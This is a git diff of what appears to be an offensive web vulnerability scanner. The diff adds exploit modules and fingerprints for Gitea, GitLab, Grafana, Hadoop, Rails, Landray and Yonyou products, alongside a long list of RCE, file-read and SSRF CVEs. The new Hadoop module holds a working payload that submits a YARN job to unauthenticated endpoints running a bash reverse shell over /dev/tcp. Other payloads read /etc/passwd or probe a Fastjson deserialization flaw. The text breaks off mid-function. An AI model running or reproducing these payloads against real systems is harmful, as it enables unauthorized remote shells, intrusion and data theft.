++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| mongo-express | CVE-2019-10758 | RCE | Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal | +| Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| NodeRED | CVE-2021-3223 | FileRead | Node-RED Directory traversal | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails Directory traversal | +| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails FileRead | +| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc writes to any file | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Spring | CVE-2020-5410 | FileRead | Spring Cloud Directory traversal | +| Spring | CVE-2021-21234 | FileRead | Spring Boot Directory traversal | +| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl Remote code execution | +| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL Remote code execution | +| Spring | CVE-2022-22965 | RCE | Spring Framework Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x Remote code execution | +| ThinkPHP | CNVD-2018-24942 | RCE | The forced route is not enabled Remote code execution | +| ThinkPHP | CNNVD-201901-445 | RCE | Core class Request Remote code execution | +| ThinkPHP | None | RCE | ThinkPHP2.x Remote code execution | +| ThinkPHP | None | SQLinject | ThinkPHP5 ids SQLinject | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Ueditor | None | SSRF | Ueditor SSRF | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic SSRF | +| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder deSerialization | +| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async deSerialization | +| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic Authentication bypass | +| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic Unauthorized command execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth Remote code execution | +| Webmin | CVE-2019-15642 | RCE | Webmin Remote code execution | ++----------------------+--------------------+--------------+------------------------------------------------------------+ +| Yonyou | CNNVD-201610-923 | SQLinject | Yonyou-GRP-U8 Proxy SQLinject | +| Yonyou | CNVD-2021-30167 | RCE | Yonyou-NC BeanShell Remote code execution | +| Yonyou | None | FileRead | Yonyou-ERP-NC NCFindWeb Directory traversal | +| Yonyou | None | DSinfo | Yonyou-U8-OA getSessionList.jsp Disclosure information | +| Yonyou | None | SQLinject | Yonyou-U8-OA test.jsp SQLinject | ++----------------------+--------------------+--------------+------------------------------------------------------------+ ``` </details> diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py index 86d8fe2..7aec2f7 100644 --- a/lib/core/coreScan.py +++ b/lib/core/coreScan.py @@ -28,12 +28,18 @@ from payloads.ElasticSearch import elasticsearch from payloads.F5BIGIP import f5bigip from payloads.Fastjson import fastjson +from payloads.Gitea import gitea +from payloads.Gitlab import gitlab +from payloads.Grafana import grafana +from payloads.ApacheHadoop import hadoop from payloads.Jenkins import jenkins from payloads.Keycloak import keycloak # from payloads.Kindeditor import kindeditor +from payloads.Landray import landray from payloads.MongoExpress import mongoexpress from payloads.Nodejs import nodejs from payloads.NodeRED import nodered +from payloads.RubyOnRails import rails from payloads.ShowDoc import showdoc from payloads.Spring import spring from payloads.ThinkPHP import thinkphp diff --git a/lib/initial/config.py b/lib/initial/config.py index 5c8fd94..aec9184 100644 --- a/lib/initial/config.py +++ b/lib/initial/config.py @@ -87,11 +87,16 @@ def __init__(self, args): 'discuz', 'django', 'drupal', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', + # 'gitea', 'gitlab', 'grafana', + 'gitea', 'gitlab', + 'hadoop', 'jenkins', # 'keycloak', 'kindeditor', 'keycloak', + 'landray', 'mongoexpress', - 'nacos', 'nodered', 'nodejs', + 'nacos', 'nodejs', 'nodered', + 'rails', 'showdoc', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', diff --git a/lib/initial/language.py b/lib/initial/language.py index d9054e1..d21eefb 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py @@ -62,7 +62,7 @@ def language(): }, 'app_list_help': { 'title': 'Supported target types(Case insensitive)', - 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' + 'name': 'AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,gitea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,nodered,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' }, 'core': { 'start': { @@ -177,7 +177,7 @@ def language(): }, 'app_list_help': { 'title': '支持的目标类型(-a参数, 不区分大小写)', - 'name': 'AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' + 'name': 'AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,gitea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,nodered,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou' }, 'core': { 'start': { diff --git a/lib/initial/list.py b/lib/initial/list.py index e9e3709..9311be5 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py @@ -8,7 +8,7 @@ def list(): ''' 显示漏洞列表 ''' vul_num = 0 vul_list = '' - vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*68) + '+\n' for vul in vul_info: for info in vul_info[vul]: @@ -16,10 +16,9 @@ def list(): vul_list += '| {}|'.format(vul.ljust(21)) vul_list += ' {}|'.format(info['vul_id'].ljust(19)) vul_list += ' {}|'.format(info['type'].ljust(13)) - vul_list += ' {}|'.format(info['method'].ljust(9)) - vul_list += ' {}\t|'.format(info['description'].ljust(62)) + vul_list += ' {}\t|'.format(info['description'].ljust(57)) vul_list += '\n' - vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*73) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*20) + '+' + ('-'*14) + '+' + ('-'*68) + '+\n' print(color.cyan(vul_list + str(vul_num - 1))) # print(vul_num) @@ -30,7 +29,6 @@ def list(): { 'vul_id': 'Vul_id', 'type': 'Type', - 'method': 'Method', 'description': 'Description\t' } ], @@ -38,7 +36,6 @@ def list(): { 'vul_id': 'None', 'type': 'unAuth', - 'method': 'GET', 'description': '阿里巴巴Druid未授权访问' } ], @@ -46,7 +43,6 @@ def list(): { 'vul_id': 'CVE-2021-29441', 'type': 'unAuth', - 'method': 'GET/POST', 'description': '阿里巴巴Nacos未授权访问' } ], @@ -54,7 +50,6 @@ def list(): { 'vul_id': 'CVE-2020-17526', 'type': 'unAuth', - 'method': 'GET', 'description': 'Airflow身份验证绕过' } ], @@ -62,7 +57,6 @@ def list(): { 'vul_id': 'CVE-2020-13945', 'type': 'unAuth', - 'method': 'GET', 'description': 'Apache APISIX默认密钥' } ], @@ -70,15 +64,20 @@ def list(): { 'vul_id': 'CVE-2020-17519', 'type': 'FileRead', - 'method': 'GET', 'description': 'Flink目录遍历' } ], + 'Apache Hadoop': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'Hadoop YARN ResourceManager 未授权访问' + } + ], 'Apache Solr': [ { 'vul_id': 'CVE-2021-27905', 'type': 'SSRF', - 'method': 'GET/POST', 'description': 'Solr SSRF/任意文件读取' } ], @@ -86,37 +85,31 @@ def list(): { 'vul_id': 'S2-001', 'type': 'RCE', - 'method': 'POST', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-005', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-007', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-008', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-009', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' }, { 'vul_id': 'S2-012', 'type': 'RCE', - 'method': 'GET', 'description': 'Struts2远程代码执行' } ], @@ -124,7 +117,6 @@ def list(): { 'vul_id': 'CVE-2017-12615', 'type': 'FileUpload', - 'method': 'PUT', 'description': 'PUT方法任意文件写入' } ], @@ -132,7 +124,6 @@ def list(): { 'vul_id': 'CVE-2018-8715', 'type': 'unAuth', - 'method': 'GET', 'description': 'AppWeb身份认证绕过' } ], @@ -140,25 +131,21 @@ def list(): { 'vul_id': 'CVE-2015-8399', 'type': 'FileRead', - 'method': 'GET', 'description': 'Confluence任意文件包含' }, { 'vul_id': 'CVE-2019-3396', 'type': 'RCE/FileRead', - 'method': 'POST', 'description': 'Confluence路径遍历和命令执行' }, { 'vul_id': 'CVE-2021-26084', 'type': 'RCE', - 'method': 'POST', 'description': 'Confluence Webwork Pre-Auth OGNL表达式命令注入' }, { 'vul_id': 'CVE-2022-26134', 'type': 'RCE', - 'method': 'GET', 'description': 'Confluence远程代码执行' } ], @@ -166,7 +153,6 @@ def list(): { 'vul_id': 'CVE-2020-3580', 'type': 'XSS', - 'method': 'POST', 'description': '思科ASA/FTD XSS跨站脚本攻击' } ], @@ -174,7 +160,6 @@ def list(): { 'vul_id': 'wooyun-2010-080723', 'type': 'RCE', - 'method': 'GET', 'description': '全局变量防御绕过RCE' } ], @@ -182,31 +167,26 @@ def list(): { 'vul_id': 'CVE-2017-12794', 'type': 'XSS', - 'method': 'GET', 'description': 'debug page XSS跨站脚本攻击' }, { 'vul_id': 'CVE-2018-14574', 'type': 'Redirect', - 'method': 'GET', 'description': 'CommonMiddleware url重定向' }, { 'vul_id': 'CVE-2019-14234', 'type': 'SQLinject', - 'method': 'GET', 'description': 'JSONfield SQL注入' }, { 'vul_id': 'CVE-2020-9402', 'type': 'SQLinject', - 'method': 'GET', 'description': 'GIS SQL注入' }, { 'vul_id': 'CVE-2021-35042', 'type': 'SQLinject', - 'method': 'GET', 'description': 'QuerySet.order_by SQL注入' } ], @@ -214,25 +194,21 @@ def list(): { 'vul_id': 'CVE-2014-3704', 'type': 'SQLinject', - 'method': 'POST', 'description': 'Drupal < 7.32 Drupalgeddon SQL 注入' }, { 'vul_id': 'CVE-2017-6920', 'type': 'RCE', - 'method': 'POST', 'description': 'Drupal Core 8 PECL YAML 反序列化代码执行' }, { 'vul_id': 'CVE-2018-7600', 'type': 'RCE', - 'method': 'POST', 'description': 'Drupal Drupalgeddon 2 远程代码执行' }, { 'vul_id': 'CVE-2018-7602', 'type': 'RCE', - 'method': 'POST', 'description': 'Drupal 远程代码执行' } ], @@ -240,25 +216,21 @@ def list(): { 'vul_id': 'CVE-2014-3120', 'type': 'RCE', - 'method': 'POST', 'description': 'ElasticSearch命令执行' }, { 'vul_id': 'CVE-2015-1427', 'type': 'RCE', - 'method': 'POST', 'description': 'ElasticSearch Groovy 沙盒绕过&&代码执行' }, { 'vul_id': 'CVE-2015-3337', 'type': 'FileRead', - 'method': 'GET', 'description': 'ElasticSearch 目录穿越' }, { 'vul_id': 'CVE-2015-5531', 'type': 'FileRead', - 'method': 'PUT/GET', 'description': 'ElasticSearch 目录穿越' }, ], @@ -266,13 +238,11 @@ def list(): { 'vul_id': 'CVE-2020-5902', 'type': 'RCE', - 'method': 'GET', 'description': 'BIG-IP远程代码执行' }, { 'vul_id': 'CVE-2022-1388', 'type': 'unAuth', - 'method': 'POST', 'description': 'BIG-IP身份认证绕过' } ], @@ -280,21 +250,44 @@ def list(): { 'vul_id': 'CNVD-2017-02833', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Fastjson <= 1.2.24 反序列化' }, { 'vul_id': 'CNVD-2019-22238', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Fastjson <= 1.2.47 反序列化' } ], + 'Gitea': [ + { + 'vul_id': 'None', + 'type': 'unAuth', + 'description': 'Gitea 1.4.0 未授权访问' + }, + ], + 'Gitlab': [ + { + 'vul_id': 'CVE-2021-22205', + 'type': 'RCE', + 'description': 'GitLab Pre-Auth 远程命令执行' + }, + { + 'vul_id': 'CVE-2021-22214', + 'type': 'SSRF', + 'description': 'Gitlab CI Lint API未授权 SSRF' + } + ], + 'Grafana': [ + { + 'vul_id': 'CVE-2021-43798', + 'type': 'FileRead', + 'description': 'Grafana 8.x 插件模块路径遍历' + }, + ], 'Jenkins': [ { 'vul_id': 'CVE-2018-1000861', 'type': 'RCE', - 'method': 'POST', 'description': 'jenkins 远程命令执行' } ], @@ -302,7 +295,6 @@ def list(): { 'vul_id': 'CVE-2020-10770', 'type': 'SSRF', - 'method': 'GET', 'description': '使用request_uri调用未经验证的URL' } ], @@ -314,11 +306,17 @@ def list(): # 'description': 'Kindeditor 目录遍历' # } # ], + 'Landray': [ + { + 'vul_id': 'CNVD-2021-28277', + 'type': 'FileRead/SSRF', + 'description': '蓝凌OA 任意文件读取/SSRF' + } + ], 'mongo-express': [ { 'vul_id': 'CVE-2019-10758', 'type': 'RCE', - 'method': 'POST', 'description': '未授权远程代码执行' } ], @@ -326,13 +324,11 @@ def list(): { 'vul_id': 'CVE-2017-14849', 'type': 'FileRead', - 'method': 'GET', 'description': 'Node.js目录穿越' }, { 'vul_id': 'CVE-2021-21315', 'type': 'RCE', - 'method': 'GET', 'description': 'Node.js命令执行' } ], @@ -340,15 +336,30 @@ def list(): { 'vul_id': 'CVE-2021-3223', 'type': 'FileRead', - 'method': 'GET', 'description': 'Node-RED 任意文件读取' } ], + 'Ruby on Rails': [ + { + 'vul_id': 'CVE-2018-3760', + 'type': 'FileRead', + 'description': 'Ruby on Rails 路径遍历' + }, + { + 'vul_id': 'CVE-2019-5418', + 'type': 'FileRead', + 'description': 'Ruby on Rails 任意文件读取' + }, + { + 'vul_id': 'CVE-2020-8163', + 'type': 'RCE', + 'description': 'Ruby on Rails 命令执行' + } + ], 'ShowDoc': [ { 'vul_id': 'CNVD-2020-26585', 'type': 'FileUpload', - 'method': 'POST', 'description': 'ShowDoc 任意文件上传' } ], @@ -356,31 +367,26 @@ def list(): { 'vul_id': 'CVE-2020-5410', 'type': 'FileRead', - 'method': 'GET', 'description': 'Spring Cloud目录遍历' }, { 'vul_id': 'CVE-2021-21234', 'type': 'FileRead', - 'method': 'GET', 'description': 'Spring Boot目录遍历' }, { 'vul_id': 'CVE-2022-22947', 'type': 'RCE', - 'method': 'POST', 'description': 'Spring Cloud Gateway SpEl远程代码执行' }, { 'vul_id': 'CVE-2022-22963', 'type': 'RCE', - 'method': 'POST', 'description': 'Spring Cloud Function SpEL远程代码执行' }, { 'vul_id': 'CVE-2022-22965', 'type': 'RCE', - 'method': 'GET/POST', 'description': 'Spring Framework远程代码执行' } ], @@ -388,31 +394,26 @@ def list(): { 'vul_id': 'CVE-2018-1002015', 'type': 'RCE', - 'method': 'GET', 'description': 'ThinkPHP5.x 远程代码执行' }, { 'vul_id': 'CNVD-2018-24942', 'type': 'RCE', - 'method': 'GET', 'description': '未开启强制路由导致RCE' }, { 'vul_id': 'CNNVD-201901-445', 'type': 'RCE', - 'method': 'POST', 'description': '核心类Request远程代码执行' }, { 'vul_id': 'None', 'type': 'RCE', - 'method': 'GET', 'description': 'ThinkPHP2.x 远程代码执行' }, { 'vul_id': 'None', 'type': 'SQLinject', - 'method': 'GET', 'description': 'ThinkPHP5 ids参数SQL注入' } ], @@ -420,7 +421,6 @@ def list(): { 'vul_id': 'None', 'type': 'SSRF', - 'method': 'GET', 'description': 'Ueditor编辑器SSRF' } ], @@ -428,31 +428,26 @@ def list(): { 'vul_id': 'CVE-2014-4210', 'type': 'SSRF', - 'method': 'GET', 'description': 'Weblogic 服务端请求伪造' }, { 'vul_id': 'CVE-2017-10271', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Weblogic XMLDecoder反序列化' }, { 'vul_id': 'CVE-2019-2725', 'type': 'unSerialize', - 'method': 'POST', 'description': 'Weblogic wls9_async反序列化' }, { 'vul_id': 'CVE-2020-14750', 'type': 'unAuth', - 'method': 'GET', 'description': 'Weblogic 权限验证绕过' }, { 'vul_id': 'CVE-2020-14882', 'type': 'RCE', - 'method': 'GET', 'description': 'Weblogic 未授权命令执行' } ], @@ -460,28 +455,39 @@ def list(): { 'vul_id': 'CVE-2019-15107', 'type': 'RCE', - 'method': 'POST', 'description': 'Webmin Pre-Auth 远程代码执行' }, { 'vul_id': 'CVE-2019-15642', 'type': 'RCE', - 'method': 'POST', 'description': 'Webmin 远程代码执行' } ], 'Yonyou': [ + { + 'vul_id': 'CNNVD-201610-923', + 'type': 'SQLinject', + 'description': '用友GRP-U8 Proxy SQL注入' + }, { 'vul_id': 'CNVD-2021-30167', 'type': 'RCE', - 'method': 'GET', 'description': '用友NC BeanShell远程命令执行' }, { 'vul_id': 'None', 'type': 'FileRead', - 'method': 'GET', 'description': '用友ERP-NC NCFindWeb目录遍历' + }, + { + 'vul_id': 'None', + 'type': 'DSinfo', + 'description': '用友U8 OA getSessionList.jsp 敏感信息泄漏' + }, + { + 'vul_id': 'None', + 'type': 'SQLinject', + 'description': '用友U8 OA test.jsp SQL注入' } ] } diff --git a/lib/initial/parse.py b/lib/initial/parse.py index 5bf0348..6e4a82f 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py @@ -19,7 +19,7 @@ def parse(): python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615 python3 vulcat.py -f url.txt -t 10 python3 vulcat.py --list -''', version='vulcat.py-1.1.1\n') +''', version='vulcat.py-1.1.2\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) @@ -55,7 +55,6 @@ def parse(): general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name']) general.add_option('--no-waf', dest='no_waf', action='store_true', help=lang['general_help']['no_waf']) general.add_option('--no-poc', dest='no_poc', action='store_true', help=lang['general_help']['no_poc']) - # general.add_option('--no-webapp', dest='no_webapp', action='store_true', help='') general.add_option('--batch', dest='batch', action='store_true', help=lang['general_help']['batch']) # * 查看漏洞列表 diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py index 8a92d33..346e528 100644 --- a/lib/plugins/fingerprint/webapp.py +++ b/lib/plugins/fingerprint/webapp.py @@ -293,6 +293,64 @@ def __init__(self): r'JSON parse error: set property error, autoCommit;' ] }, + { + 'name': 'fastjson', + 'path': '', + 'data': '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"abcd","autoCommit":true}}', + 'fingerprint': [ + r'com\.alibaba\.fastjson\.JSONException:', + r'JSON parse error: set property error, autoCommit;' + ] + }, + { + 'name': 'gitea', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<title>.* - Gitea: Git with a cup of tea</title>', + r'Copyright (c) .* The Gitea Authors', + r'Gitea 当前版本: .* 页面: <strong>\d*ms</strong> 模板: <strong>\d*ms</strong>', + r'Go 语言</a> 支持的平台都可以运行 Gitea,包括 Windows、Mac、Linux 以及 ARM。挑一个您喜欢的就行!', + r'<p class="large">.*一个廉价的树莓派的配置足以满足 Gitea 的最低系统硬件要求。最大程度上节省您的服务器资源!.*</p>', + r'所有的代码都开源在 <a target="_blank" rel="noopener" href="https://github\.com/go-gitea/gitea/">GitHub</a> 上,赶快加入我们来共同发展这个伟大的项目!还等什么?成为贡献者吧!' + ] + }, + { + 'name': 'gitlab', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<title>GitLab</title>', + r'<meta content="GitLab" property="og:site_name">', + r'<meta content="GitLab Community Edition" property="og:description">', + r'meta content="GitLab Community Edition" property="twitter:description"', + r'meta content="GitLab Community Edition" name="description"', + r'<a href="https://about\.gitlab\.com/">About GitLab</a>' + ] + }, + { + 'name': 'grafana', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<link rel="mask-icon" href="public/img/grafana_mask_icon\.svg"', + r'body class="theme-dark app-grafana', + r'public/img/grafana_icon\.svg', + r'Loading Grafana.*2\..*grafana.*3\..*4\..*5\.', + r'window\.__grafana.*' + ] + }, + { + 'name': 'hadoop', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<img src="/static/hadoop-st\.png">', + r'<a href="/jmx\?qry=Hadoop:\*">Server metrics</a>', + r"'sType':'natural', 'aTargets': \[0\], 'mRender': parseHadoopID", + r'<pre>org\.apache\.hadoop\.yarn\.webapp\.WebAppException:' + ] + }, { 'name': 'jenkins', 'path': '', @@ -322,6 +380,15 @@ def __init__(self): # r'KindEditor - WYSIWYG HTML Editor for Internet' # ] # }, + { + 'name': 'landray', + 'path': '', + 'data': '', + 'fingerprint': [ + r'\["sys/ui/extend.{0,50}\.css"\]', + r"'lui': 'sys/ui/js'" + ] + }, { 'name': 'mongoexpress', 'path': '', @@ -353,6 +420,21 @@ def __init__(self): r'<title>Node-RED</title>' ] }, + { + 'name': 'rails', + 'path': '', + 'data': '', + 'fingerprint': [ + r'<title>Ruby on Rails</title>', + r'<h1>Yay! You’re on Rails!</h1>', + r'<strong>Rails version:</strong>.*<br />', + r'<strong>Ruby version:</strong>.*(.*)', + r'<p><code>Rails\.root: .*</code></p>', + r'<li>For more information about routes, please see the Rails guide<a href="http://guides\.rubyonrails\.org/routing\.html">Rails Routing from the Outside In</a>\.</li>', + r'<title>RailsFileContent</title>', + r'<script src="/assets/.{0,30}\.self-.{64}\.js\?body=1" data-turbolinks-track=".{0,10}"></script>' + ] + }, { 'name': 'showdoc', 'path': '', @@ -458,7 +540,17 @@ def __init__(self): 'data': '', 'fingerprint': [ r'<div class="footer">版权所有.*用友网络科技股份有限公司.*', - r'<title>YONYOU NC</title>' + r'<title>YONYOU NC</title>', + r'//判断操作系统.*\.\./Client/Uclient/UClient\.dmg.*UClient客户端下载', + r'<title>用友GRP-U8.*行政事业内控管理软件.*</title>', + r'<div class="foot foot1".*>北京用友政务软件有限公司.*</div>', + r'<script type="text/javascript" src="/yyoa/seeyonoa/common/js/jquery/jquery\.js"></script>', + r'<script type="text/javascript" src="seeyonoa/common/js/popDialog\.jsp"></script>', + r'<li class="A6_name"><img src="seeyonoa/ui/images/login/oem_name\.png" /></li>', + r'<title>.* 《用友U8\+OA基础版》</title>', + r'<title>.* 《用友U8-OA企业版》</title>', + r'<li class="copyright"><span>©用友软件珠海研发基地</span></li>', + r'<title>.*-FE协作办公平台\d\.\d(\.\d)?</title>' ] }, # { diff --git a/lib/report/output.py b/lib/report/output.py index a0a8b63..561d7e3 100644 --- a/lib/report/output.py +++ b/lib/report/output.py @@ -82,7 +82,7 @@ def output_json(results, filename, lang): # * Response对象不能json化, 转为字符串 for key in result_info.keys(): if type(result_info[key]) == requests.models.Response: - result_info[key] = output_res(result_info[key], iscolor=False) + result_info[key] = output_res(key, result_info[key], iscolor=False) results_info_list.append(json.dumps(result_info, indent=4) + '\n') results_info_list = set(results_info_list) @@ -125,7 +125,7 @@ def output_vul_info_color(result): result_info += output_dict(key, value) elif value_type == requests.models.Response: # * Response输出方式 - result_info += output_res(value) + result_info += output_res(key, value) return result_info @@ -144,7 +144,7 @@ def output_vul_info(result): result_info += output_dict(key, value, iscolor=False) elif value_type == requests.models.Response: - result_info += output_res(value, iscolor=False) + result_info += output_res(key, value, iscolor=False) return result_info @@ -205,12 +205,13 @@ def output_dict(key, value, iscolor=True): return info_dict -def output_res(res, iscolor=True): +def output_res(key, res, iscolor=True): ''' 接收一个requests结果, 返回一个http数据包 ''' info_res = '' if iscolor: try: + info_res += color.yellow_ex(key) + ':' info_res += color.red_ex(' [Request') info_res += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str) info_res += color.black_ex('\n' + 'Host' + ': ' + logger.get_domain(res.request.url)) @@ -218,14 +219,18 @@ def output_res(res, iscolor=True): for key, value in res.request.headers.items(): info_res += color.black_ex('\n' + key + ': ' + value) if res.request.body: - info_res += color.black_ex('\n\n' + res.request.body) + if (type(res.request.body) == bytes): + info_res += color.black_ex('\n\n' + res.request.body.decode()) + else: + info_res += color.black_ex('\n\n' + res.request.body) info_res += color.red_ex(']') - info_res += color.reset('\n') + info_res += color.reset('\n ') except: return info_res else: try: + info_res += key + ':' info_res += ' [Request' info_res += '\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str info_res += '\n' + 'Host' + ': ' + logger.get_domain(res.request.url) @@ -233,9 +238,12 @@ def output_res(res, iscolor=True): for key, value in res.request.headers.items(): info_res += '\n' + key + ': ' + value if res.request.body: - info_res += '\n\n' + res.request.body + if (type(res.request.body) == bytes): + info_res += '\n\n' + res.request.body.decode() + else: + info_res += '\n\n' + res.request.body - info_res += ']' + info_res += ']\n ' except: return info_res diff --git a/lib/tool/logger.py b/lib/tool/logger.py index 9da38f2..617dda5 100644 --- a/lib/tool/logger.py +++ b/lib/tool/logger.py @@ -68,7 +68,10 @@ def logging_4(self, vul_info, status_code, res): for key, value in res.request.headers.items(): info_4 += color.black_ex('\n' + key + ': ' + value) if res.request.body: - info_4 += color.black_ex('\n\n' + res.request.body) + if (type(res.request.body) == bytes): + info_4 += color.black_ex('\n\n' + res.request.body.decode()) + else: + info_4 += color.black_ex('\n\n' + res.request.body) info_4 += color.red_ex('\n]') info_4 += color.reset('') diff --git a/payloads/ApacheHadoop.py b/payloads/ApacheHadoop.py new file mode 100644 index 0000000..e9b9532 --- /dev/null +++ b/payloads/ApacheHadoop.py @@ -0,0 +1,155 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + + Apache Hadoop扫描类: + Hadoop YARN ResourceManager 未授权访问 + 暂无编号 + Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/ +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from thirdparty import requests +from time import sleep + +class ApacheHadoop(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + + self.app_name = 'ApacheHadoop' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.apache_hadoop_unauthorized_payloads = [ + { + 'path': 'ws/v1/cluster/apps/new-application', + 'data': '' + }, + # { + # 'path': 'ws/v1/cluster/apps', + # 'data': { + # 'application-id': '', + # 'application-name': 'mouse', + # 'am-container-spec': { + # 'commands': { + # 'command': 'curl DNSdomain', # * ping或curl无效, 放弃 + # }, + # }, + # 'application-type': 'YARN', + # } + # }, + { + 'path': 'ws/v1/cluster/apps', + 'data': { + 'application-id': '', + 'application-name': 'mouse', + 'am-container-spec': { + 'commands': { + 'command': '/bin/bash >& /dev/tcp/ip/port 0>&1', + }, + }, + 'application-type': 'YARN', + } + }, + ] + + def apache_hadoop_unauthorized_scan(self, url): + ''' YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, + 如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令 + ''' + # sessid = '3861eb6b3d023d464efe85aa01277d27' + + vul_info = {} + vul_info['app_name'] = self.app_name + vul_info['vul_type'] = 'unAuthorized' + vul_info['vul_id'] = 'ApacheHadoop-unAuth' + vul_info['vul_method'] = 'POST' + vul_info['headers'] = { + 'Content-Type': 'application/json' + } + + headers = self.headers.copy() + headers.update(vul_info['headers']) + + for payload in range(len(self.apache_hadoop_unauthorized_payloads)): + # md = random_md5() # * 随机md5值, 8位 + # dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 + + path = self.apache_hadoop_unauthorized_payloads[payload]['path'] + data = self.apache_hadoop_unauthorized_payloads[payload]['data'] + target = url + path + + vul_info['path'] = path + vul_info['data'] = data + vul_info['target'] = target + + try: + if (payload == 0): # * 获取application-id + res1 = requests.post( + target, + timeout=self.timeout, + headers=headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res1.status_code, res1) # * LOG + + try: + if (res1.json()['application-id']): + 